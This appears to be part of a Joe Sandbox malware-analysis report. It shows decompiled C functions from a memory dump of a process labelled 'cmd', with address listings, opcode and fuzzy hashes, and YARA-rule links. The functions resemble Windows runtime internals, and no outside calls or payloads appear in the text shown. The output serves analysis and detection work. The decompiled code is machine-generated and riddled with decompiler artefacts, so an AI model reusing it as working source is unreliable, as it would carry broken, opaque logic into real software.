                                                                                                                                          0x03c0fe06
                                                                                                                                          0x03c0fe06
                                                                                                                                          0x03c4c0c8
                                                                                                                                          0x03c0fe2d
                                                                                                                                          0x03c0fe2d
                                                                                                                                          0x00000000
                                                                                                                                          0x03c0fe2d
                                                                                                                                          0x03c4c0d1
                                                                                                                                          0x03c4c0e0
                                                                                                                                          0x03c4c0e5
                                                                                                                                          0x03c4c0e5
                                                                                                                                          0x03c4c0e8
                                                                                                                                          0x00000000
                                                                                                                                          0x03c4c0e8
                                                                                                                                          0x03c0fdf4
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c0fdf6
                                                                                                                                          0x03c0fdfa
                                                                                                                                          0x03c0fe1a
                                                                                                                                          0x03c0fe1f
                                                                                                                                          0x03c0fe1f
                                                                                                                                          0x03c0fdfc
                                                                                                                                          0x00000000
                                                                                                                                          0x03c0fdfc
                                                                                                                                          0x03c0fdcc
                                                                                                                                          0x03c0fdd0
                                                                                                                                          0x03c0fe26
                                                                                                                                          0x00000000
                                                                                                                                          0x03c0fe26
                                                                                                                                          0x03c0fdd8
                                                                                                                                          0x03c0fddb
                                                                                                                                          0x03c0fddd
                                                                                                                                          0x03c0fde0
                                                                                                                                          0x00000000

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                                                                                                                          • Instruction ID: 19759265c2446dc8fcd632ed14e390689cd79b887228ca17fbae97861c87abc5
                                                                                                                                          • Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                                                                                                                          • Instruction Fuzzy Hash: 84217C72600780DFD731CF4AC540A66F7E5EB94B10F2881BEE955CB661D730AE84CB80
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03BE841F Relevance: .1, Instructions: 64COMMONCrypto
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 80%
                                                                                                                                          			E03BE841F(signed int __ecx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _t43;
				signed int _t46;
				signed int _t50;
				signed int _t57;
				signed int _t64;

				_v16 = __ecx;
				_t43 =  *0x7ffe0004;
				_v8 = _t43;
				_t57 =  *0x7ffe0014 ^  *( *[fs:0x18] + 0x24) ^  *( *[fs:0x18] + 0x20) ^  *0x7ffe0018;
				_v12 = 0x7ffe0014;
				if(_t43 < 0x1000000) {
					while(1) {
						_t46 =  *0x7ffe0324;
						_t50 =  *0x7FFE0320;
						if(_t46 ==  *0x7FFE0328) {
							break;
						}
						asm("pause");
					}
					_t57 = _v12;
					_t64 = ((_t50 * _v8 >> 0x00000020 << 0x00000020 | _t50 * _v8) >> 0x18) + (_t46 << 8) * _v8;
				} else {
					_t64 = ( *0x7ffe0320 * _t43 >> 0x00000020 << 0x00000020 | 0x7ffe0320 * _t43) >> 0x18;
				}
				_push(0);
				_push( &_v24);
				E03C19810();
				return _t64 ^ _v20 ^ _v24 ^ _t57 ^ _v16;
			}













                                                                                                                                          0x03be842f
                                                                                                                                          0x03be8448
                                                                                                                                          0x03be844e
                                                                                                                                          0x03be8459
                                                                                                                                          0x03be845b
                                                                                                                                          0x03be8464
                                                                                                                                          0x03c39ac3
                                                                                                                                          0x03c39ac3
                                                                                                                                          0x03c39ac5
                                                                                                                                          0x03c39acb
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c39acd
                                                                                                                                          0x03c39acd
                                                                                                                                          0x03c39ad1
                                                                                                                                          0x03c39ae9
                                                                                                                                          0x03be846a
                                                                                                                                          0x03be8475
                                                                                                                                          0x03be8479
                                                                                                                                          0x03be847c
                                                                                                                                          0x03be8481
                                                                                                                                          0x03be8482
                                                                                                                                          0x03be849a

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 63ac1e4b842af79e23be26fd2b4bf9cab7c83af8bb38cd4daac8e95d5517faf3
                                                                                                                                          • Instruction ID: d0bfa0542b5f19431a1292066ca7a8e43215aaada16a5ff081826b23fbbf70bd
                                                                                                                                          • Opcode Fuzzy Hash: 63ac1e4b842af79e23be26fd2b4bf9cab7c83af8bb38cd4daac8e95d5517faf3
                                                                                                                                          • Instruction Fuzzy Hash: D2219D76E00119CBCB14CFA9C580A8AF3F9FB88350FA641A5E908F7340CA70AE04CBD0
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03C0B390 Relevance: .1, Instructions: 63COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 54%
                                                                                                                                          			E03C0B390(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed char _t12;
				signed int _t16;
				signed int _t21;
				void* _t28;
				signed int _t30;
				signed int _t36;
				signed int _t41;

				_push(__ecx);
				_t41 = _a4 + 0xffffffb8;
				E03BF2280(_t12, 0x3cc8608);
				 *(_t41 + 0x34) =  *(_t41 + 0x34) - 1;
				asm("sbb edi, edi");
				_t36 =  !( ~( *(_t41 + 0x34))) & _t41;
				_v8 = _t36;
				asm("lock cmpxchg [ebx], ecx");
				_t30 = 1;
				if(1 != 1) {
					while(1) {
						_t21 = _t30 & 0x00000006;
						_t16 = _t30;
						_t28 = (0 | _t21 == 0x00000002) * 4 - 1 + _t30;
						asm("lock cmpxchg [edi], esi");
						if(_t16 == _t30) {
							break;
						}
						_t30 = _t16;
					}
					_t36 = _v8;
					if(_t21 == 2) {
						_t16 = E03C100C2(0x3cc8608, 0, _t28);
					}
				}
				if(_t36 != 0) {
					_t16 = L03BF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
				}
				return _t16;
			}











                                                                                                                                          0x03c0b395
                                                                                                                                          0x03c0b3a2
                                                                                                                                          0x03c0b3a5
                                                                                                                                          0x03c0b3aa
                                                                                                                                          0x03c0b3b2
                                                                                                                                          0x03c0b3ba
                                                                                                                                          0x03c0b3bd
                                                                                                                                          0x03c0b3c0
                                                                                                                                          0x03c0b3c4
                                                                                                                                          0x03c0b3c9
                                                                                                                                          0x03c4a3e9
                                                                                                                                          0x03c4a3ed
                                                                                                                                          0x03c4a3f0
                                                                                                                                          0x03c4a3ff
                                                                                                                                          0x03c4a403
                                                                                                                                          0x03c4a409
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c4a40b
                                                                                                                                          0x03c4a40b
                                                                                                                                          0x03c4a40f
                                                                                                                                          0x03c4a415
                                                                                                                                          0x03c4a423
                                                                                                                                          0x03c4a423
                                                                                                                                          0x03c4a415
                                                                                                                                          0x03c0b3d1
                                                                                                                                          0x03c0b3e8
                                                                                                                                          0x03c0b3e8
                                                                                                                                          0x03c0b3d9

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 1fabaa3845fb14b6c5f752e0c357b0941e7f9da4dd8d05f47a21f91072b1dfd9
                                                                                                                                          • Instruction ID: e3f2a48712c72c3772686002a94a9ee6b92595ebba68c898030be38d4eaadca1
                                                                                                                                          • Opcode Fuzzy Hash: 1fabaa3845fb14b6c5f752e0c357b0941e7f9da4dd8d05f47a21f91072b1dfd9
                                                                                                                                          • Instruction Fuzzy Hash: 6D11517A3512249BCB29CA259D81A6B726AEBC5330B28116DDE16CB3C0DE31EC02C394
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03BD9240 Relevance: .1, Instructions: 63COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 77%
                                                                                                                                          			E03BD9240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t41;
				intOrPtr* _t46;
				void* _t48;
				intOrPtr _t50;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr _t62;
				intOrPtr _t65;
				void* _t66;
				void* _t68;

				_push(0xc);
				_push(0x3caf708);
				E03C2D08C(__ebx, __edi, __esi);
				_t65 = __ecx;
				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
				if( *(__ecx + 0x24) != 0) {
					_push( *(__ecx + 0x24));
					E03C195D0();
					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
				}
				L6();
				L6();
				_push( *((intOrPtr*)(_t65 + 0x28)));
				E03C195D0();
				_t33 =  *0x3cc84c4; // 0x0
				L03BF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
				_t37 =  *0x3cc84c4; // 0x0
				L03BF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
				_t41 =  *0x3cc84c4; // 0x0
				E03BF2280(L03BF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x3cc86b4);
				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
				_t46 = _t65 + 0xe8;
				_t62 =  *_t46;
				_t60 =  *((intOrPtr*)(_t46 + 4));
				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
					_t61 = 3;
					asm("int 0x29");
					_push(_t65);
					_t66 = _t61;
					_t23 = _t66 + 0x14; // 0x8df8084c
					_push( *_t23);
					E03C195D0();
					_t24 = _t66 + 0x10; // 0x89e04d8b
					_push( *_t24);
					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
					_t48 = E03C195D0();
					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
					return _t48;
				} else {
					 *_t60 = _t62;
					 *((intOrPtr*)(_t62 + 4)) = _t60;
					 *(_t68 - 4) = 0xfffffffe;
					E03BD9325();
					_t50 =  *0x3cc84c4; // 0x0
					return E03C2D0D1(L03BF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
				}
			}















                                                                                                                                          0x03bd9240
                                                                                                                                          0x03bd9242
                                                                                                                                          0x03bd9247
                                                                                                                                          0x03bd924c
                                                                                                                                          0x03bd924e
                                                                                                                                          0x03bd9255
                                                                                                                                          0x03bd9257
                                                                                                                                          0x03bd925a
                                                                                                                                          0x03bd925f
                                                                                                                                          0x03bd925f
                                                                                                                                          0x03bd9266
                                                                                                                                          0x03bd9271
                                                                                                                                          0x03bd9276
                                                                                                                                          0x03bd9279
                                                                                                                                          0x03bd927e
                                                                                                                                          0x03bd9295
                                                                                                                                          0x03bd929a
                                                                                                                                          0x03bd92b1
                                                                                                                                          0x03bd92b6
                                                                                                                                          0x03bd92d7
                                                                                                                                          0x03bd92dc
                                                                                                                                          0x03bd92e0
                                                                                                                                          0x03bd92e6
                                                                                                                                          0x03bd92e8
                                                                                                                                          0x03bd92ee
                                                                                                                                          0x03bd9332
                                                                                                                                          0x03bd9333
                                                                                                                                          0x03bd9337
                                                                                                                                          0x03bd9338
                                                                                                                                          0x03bd933a
                                                                                                                                          0x03bd933a
                                                                                                                                          0x03bd933d
                                                                                                                                          0x03bd9342
                                                                                                                                          0x03bd9342
                                                                                                                                          0x03bd9345
                                                                                                                                          0x03bd9349
                                                                                                                                          0x03bd934e
                                                                                                                                          0x03bd9352
                                                                                                                                          0x03bd9357
                                                                                                                                          0x03bd92f4
                                                                                                                                          0x03bd92f4
                                                                                                                                          0x03bd92f6
                                                                                                                                          0x03bd92f9
                                                                                                                                          0x03bd9300
                                                                                                                                          0x03bd9306
                                                                                                                                          0x03bd9324
                                                                                                                                          0x03bd9324

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                          • Opcode ID: c466eff5b95c485f374712415fd3a07140753da35eb55357a3ce779dcac4d35d
                                                                                                                                          • Instruction ID: a72a67f17b4bf316b444132990dbea9bd77b15cdfada398b5613aaa2fdea25c2
                                                                                                                                          • Opcode Fuzzy Hash: c466eff5b95c485f374712415fd3a07140753da35eb55357a3ce779dcac4d35d
                                                                                                                                          • Instruction Fuzzy Hash: 0B214A36451B00DFC721EF68CA10F5AB7B9FF08718F0545A8E109DBAA1DB34E941DB84
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03C64257 Relevance: .1, Instructions: 60COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 90%
                                                                                                                                          			E03C64257(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t18;
				intOrPtr _t24;
				intOrPtr* _t27;
				intOrPtr* _t30;
				intOrPtr* _t31;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr* _t35;
				void* _t37;
				void* _t38;
				void* _t39;
				void* _t43;

				_t39 = __eflags;
				_t35 = __edi;
				_push(8);
				_push(0x3cb08d0);
				E03C2D08C(__ebx, __edi, __esi);
				_t37 = __ecx;
				E03C641E8(__ebx, __edi, __ecx, _t39);
				E03BEEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
				_t18 = _t37 + 8;
				_t33 =  *_t18;
				_t27 =  *((intOrPtr*)(_t18 + 4));
				if( *((intOrPtr*)(_t33 + 4)) != _t18 ||  *_t27 != _t18) {
					L8:
					_push(3);
					asm("int 0x29");
				} else {
					 *_t27 = _t33;
					 *((intOrPtr*)(_t33 + 4)) = _t27;
					_t35 = 0x3cc87e4;
					_t18 =  *0x3cc87e0; // 0x0
					while(_t18 != 0) {
						_t43 = _t18 -  *0x3cc5cd0; // 0xffffffff
						if(_t43 >= 0) {
							_t31 =  *0x3cc87e4; // 0x0
							_t18 =  *_t31;
							if( *((intOrPtr*)(_t31 + 4)) != _t35 ||  *((intOrPtr*)(_t18 + 4)) != _t31) {
								goto L8;
							} else {
								 *0x3cc87e4 = _t18;
								 *((intOrPtr*)(_t18 + 4)) = _t35;
								L03BD7055(_t31 + 0xfffffff8);
								_t24 =  *0x3cc87e0; // 0x0
								_t18 = _t24 - 1;
								 *0x3cc87e0 = _t18;
								continue;
							}
						}
						goto L9;
					}
				}
				L9:
				__eflags =  *0x3cc5cd0;
				if( *0x3cc5cd0 <= 0) {
					L03BD7055(_t37);
				} else {
					_t30 = _t37 + 8;
					_t34 =  *0x3cc87e8; // 0x0
					__eflags =  *_t34 - _t35;
					if( *_t34 != _t35) {
						goto L8;
					} else {
						 *_t30 = _t35;
						 *((intOrPtr*)(_t30 + 4)) = _t34;
						 *_t34 = _t30;
						 *0x3cc87e8 = _t30;
						 *0x3cc87e0 = _t18 + 1;
					}
				}
				 *(_t38 - 4) = 0xfffffffe;
				return E03C2D0D1(L03C64320());
			}















                                                                                                                                          0x03c64257
                                                                                                                                          0x03c64257
                                                                                                                                          0x03c64257
                                                                                                                                          0x03c64259
                                                                                                                                          0x03c6425e
                                                                                                                                          0x03c64263
                                                                                                                                          0x03c64265
                                                                                                                                          0x03c64273
                                                                                                                                          0x03c64278
                                                                                                                                          0x03c6427c
                                                                                                                                          0x03c6427f
                                                                                                                                          0x03c64281
                                                                                                                                          0x03c64287
                                                                                                                                          0x03c642d7
                                                                                                                                          0x03c642d7
                                                                                                                                          0x03c642da
                                                                                                                                          0x03c6428d
                                                                                                                                          0x03c6428d
                                                                                                                                          0x03c6428f
                                                                                                                                          0x03c64292
                                                                                                                                          0x03c64297
                                                                                                                                          0x03c6429c
                                                                                                                                          0x03c642a0
                                                                                                                                          0x03c642a6
                                                                                                                                          0x03c642a8
                                                                                                                                          0x03c642ae
                                                                                                                                          0x03c642b3
                                                                                                                                          0x00000000
                                                                                                                                          0x03c642ba
                                                                                                                                          0x03c642ba
                                                                                                                                          0x03c642bf
                                                                                                                                          0x03c642c5
                                                                                                                                          0x03c642ca
                                                                                                                                          0x03c642cf
                                                                                                                                          0x03c642d0
                                                                                                                                          0x00000000
                                                                                                                                          0x03c642d0
                                                                                                                                          0x03c642b3
                                                                                                                                          0x00000000
                                                                                                                                          0x03c642a6
                                                                                                                                          0x03c6429c
                                                                                                                                          0x03c642dc
                                                                                                                                          0x03c642dc
                                                                                                                                          0x03c642e3
                                                                                                                                          0x03c64309
                                                                                                                                          0x03c642e5
                                                                                                                                          0x03c642e5
                                                                                                                                          0x03c642e8
                                                                                                                                          0x03c642ee
                                                                                                                                          0x03c642f0
                                                                                                                                          0x00000000
                                                                                                                                          0x03c642f2
                                                                                                                                          0x03c642f2
                                                                                                                                          0x03c642f4
                                                                                                                                          0x03c642f7
                                                                                                                                          0x03c642f9
                                                                                                                                          0x03c64300
                                                                                                                                          0x03c64300
                                                                                                                                          0x03c642f0
                                                                                                                                          0x03c6430e
                                                                                                                                          0x03c6431f

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: a86930714a8ba679d68df696154eb3759131c0fc3d3e772a3e1b4b0c198e09b2
                                                                                                                                          • Instruction ID: c9beae875f0b80b2a524cf65f8560bb49a0b60b78dc6708c943c6e19ff60cc65
                                                                                                                                          • Opcode Fuzzy Hash: a86930714a8ba679d68df696154eb3759131c0fc3d3e772a3e1b4b0c198e09b2
                                                                                                                                          • Instruction Fuzzy Hash: 1D216A74511710CFC719EF26D080A56BBF1FB85314B6582AED116CF298EB31E981CB10
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03C02397 Relevance: .1, Instructions: 59COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 34%
                                                                                                                                          			E03C02397(intOrPtr _a4) {
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t11;
				void* _t19;
				void* _t25;
				void* _t26;
				intOrPtr _t27;
				void* _t28;
				void* _t29;

				_t27 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294));
				if( *0x3cc848c != 0) {
					L03BFFAD0(0x3cc8610);
					if( *0x3cc848c == 0) {
						E03BFFA00(0x3cc8610, _t19, _t27, 0x3cc8610);
						goto L1;
					} else {
						_push(0);
						_push(_a4);
						_t26 = 4;
						_t29 = E03C02581(0x3cc8610, 0x3bb50a0, _t26, _t27, _t28);
						E03BFFA00(0x3cc8610, 0x3bb50a0, _t27, 0x3cc8610);
					}
				} else {
					L1:
					_t11 =  *0x3cc8614; // 0x0
					if(_t11 == 0) {
						_t11 = E03C14886(0x3bb1088, 1, 0x3cc8614);
					}
					_push(0);
					_push(_a4);
					_t25 = 4;
					_t29 = E03C02581(0x3cc8610, (_t11 << 4) + 0x3bb5070, _t25, _t27, _t28);
				}
				if(_t29 != 0) {
					 *((intOrPtr*)(_t29 + 0x38)) = _t27;
					 *((char*)(_t29 + 0x40)) = 0;
				}
				return _t29;
			}















                                                                                                                                          0x03c023b0
                                                                                                                                          0x03c023b6
                                                                                                                                          0x03c02409
                                                                                                                                          0x03c02415
                                                                                                                                          0x03c45ae9
                                                                                                                                          0x00000000
                                                                                                                                          0x03c0241b
                                                                                                                                          0x03c0241b
                                                                                                                                          0x03c0241d
                                                                                                                                          0x03c02427
                                                                                                                                          0x03c0242e
                                                                                                                                          0x03c02430
                                                                                                                                          0x03c02430
                                                                                                                                          0x03c023b8
                                                                                                                                          0x03c023b8
                                                                                                                                          0x03c023b8
                                                                                                                                          0x03c023bf
                                                                                                                                          0x03c023fc
                                                                                                                                          0x03c023fc
                                                                                                                                          0x03c023c1
                                                                                                                                          0x03c023c3
                                                                                                                                          0x03c023d0
                                                                                                                                          0x03c023d8
                                                                                                                                          0x03c023d8
                                                                                                                                          0x03c023dc
                                                                                                                                          0x03c023de
                                                                                                                                          0x03c023e1
                                                                                                                                          0x03c023e1
                                                                                                                                          0x03c023ec

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 918e3b6c48e0cde32e389d38883a2eefb1313b689cbe87b82146b0d1bef92f60
                                                                                                                                          • Instruction ID: 65e54dd325af05b9874c200154e01d9a7887027b5bceccd93124cdca4748338b
                                                                                                                                          • Opcode Fuzzy Hash: 918e3b6c48e0cde32e389d38883a2eefb1313b689cbe87b82146b0d1bef92f60
                                                                                                                                          • Instruction Fuzzy Hash: 8E114E327447846BD731E63A9C84B26B2ECEB50614F594976F706EF2C1CAB0D805D754
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03C546A7 Relevance: .1, Instructions: 59COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 93%
                                                                                                                                          			E03C546A7(signed short* __ecx, unsigned int __edx, char* _a4) {
				signed short* _v8;
				unsigned int _v12;
				intOrPtr _v16;
				signed int _t22;
				signed char _t23;
				short _t32;
				void* _t38;
				char* _t40;

				_v12 = __edx;
				_t29 = 0;
				_v8 = __ecx;
				_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
				_t38 = L03BF4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *__ecx & 0x0000ffff);
				if(_t38 != 0) {
					_t40 = _a4;
					 *_t40 = 1;
					E03C1F3E0(_t38, _v8[2],  *_v8 & 0x0000ffff);
					_t22 = _v12 >> 1;
					_t32 = 0x2e;
					 *((short*)(_t38 + _t22 * 2)) = _t32;
					 *((short*)(_t38 + 2 + _t22 * 2)) = 0;
					_t23 = E03C0D268(_t38, 1);
					asm("sbb al, al");
					 *_t40 =  ~_t23 + 1;
					L03BF77F0(_v16, 0, _t38);
				} else {
					 *_a4 = 0;
					_t29 = 0xc0000017;
				}
				return _t29;
			}











                                                                                                                                          0x03c546b7
                                                                                                                                          0x03c546ba
                                                                                                                                          0x03c546c5
                                                                                                                                          0x03c546c8
                                                                                                                                          0x03c546d0
                                                                                                                                          0x03c546d4
                                                                                                                                          0x03c546e6
                                                                                                                                          0x03c546e9
                                                                                                                                          0x03c546f4
                                                                                                                                          0x03c546ff
                                                                                                                                          0x03c54705
                                                                                                                                          0x03c54706
                                                                                                                                          0x03c5470c
                                                                                                                                          0x03c54713
                                                                                                                                          0x03c5471b
                                                                                                                                          0x03c54723
                                                                                                                                          0x03c54725
                                                                                                                                          0x03c546d6
                                                                                                                                          0x03c546d9
                                                                                                                                          0x03c546db
                                                                                                                                          0x03c546db
                                                                                                                                          0x03c54732

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                                                                                                                          • Instruction ID: 8b2772e62e33c0fe5f8e463f2589cabc7a13c19461a031889e357e3e3dcb9d67
                                                                                                                                          • Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                                                                                                                          • Instruction Fuzzy Hash: 24110276504208BFCB05DF5D98808BEB7B9EF85304F1080AAF944CB351DA319E55D3A4
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03BDC962 Relevance: .1, Instructions: 57COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 42%
                                                                                                                                          			E03BDC962(char __ecx) {
				signed int _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t19;
				char _t22;
				intOrPtr _t26;
				intOrPtr _t27;
				char _t32;
				char _t34;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t38;
				signed int _t39;

				_t41 = (_t39 & 0xfffffff8) - 0xc;
				_v8 =  *0x3ccd360 ^ (_t39 & 0xfffffff8) - 0x0000000c;
				_t34 = __ecx;
				if(( *( *[fs:0x30] + 0x68) & 0x00000100) != 0) {
					_t26 = 0;
					E03BEEEF0(0x3cc70a0);
					_t29 =  *((intOrPtr*)(_t34 + 0x18));
					if(E03C5F625( *((intOrPtr*)(_t34 + 0x18))) != 0) {
						L9:
						E03BEEB70(_t29, 0x3cc70a0);
						_t19 = _t26;
						L2:
						_pop(_t35);
						_pop(_t37);
						_pop(_t27);
						return E03C1B640(_t19, _t27, _v8 ^ _t41, _t32, _t35, _t37);
					}
					_t29 = _t34;
					_t26 = E03C5F1FC(_t34, _t32);
					if(_t26 < 0) {
						goto L9;
					}
					_t38 =  *0x3cc70c0; // 0x0
					while(_t38 != 0x3cc70c0) {
						_t22 =  *((intOrPtr*)(_t38 + 0x18));
						_t38 =  *_t38;
						_v12 = _t22;
						if(_t22 != 0) {
							_t29 = _t22;
							 *0x3ccb1e0( *((intOrPtr*)(_t34 + 0x30)),  *((intOrPtr*)(_t34 + 0x18)),  *((intOrPtr*)(_t34 + 0x20)), _t34);
							_v12();
						}
					}
					goto L9;
				}
				_t19 = 0;
				goto L2;
			}


















                                                                                                                                          0x03bdc96a
                                                                                                                                          0x03bdc974
                                                                                                                                          0x03bdc988
                                                                                                                                          0x03bdc98a
                                                                                                                                          0x03c47c9d
                                                                                                                                          0x03c47c9f
                                                                                                                                          0x03c47ca4
                                                                                                                                          0x03c47cae
                                                                                                                                          0x03c47cf0
                                                                                                                                          0x03c47cf5
                                                                                                                                          0x03c47cfa
                                                                                                                                          0x03bdc992
                                                                                                                                          0x03bdc996
                                                                                                                                          0x03bdc997
                                                                                                                                          0x03bdc998
                                                                                                                                          0x03bdc9a3
                                                                                                                                          0x03bdc9a3
                                                                                                                                          0x03c47cb0
                                                                                                                                          0x03c47cb7
                                                                                                                                          0x03c47cbb
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c47cbd
                                                                                                                                          0x03c47ce8
                                                                                                                                          0x03c47cc5
                                                                                                                                          0x03c47cc8
                                                                                                                                          0x03c47cca
                                                                                                                                          0x03c47cd0
                                                                                                                                          0x03c47cd6
                                                                                                                                          0x03c47cde
                                                                                                                                          0x03c47ce4
                                                                                                                                          0x03c47ce4
                                                                                                                                          0x03c47cd0
                                                                                                                                          0x00000000
                                                                                                                                          0x03c47ce8
                                                                                                                                          0x03bdc990
                                                                                                                                          0x00000000

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: ca5d51645cdc36c350f375154cac890e86e55dabd7fb6545467d34248e78e5c3
                                                                                                                                          • Instruction ID: 1e7adad86cb12f9f7b3d3d51f9580fb5b63adf3ba16bc4027e78c889c0b77be4
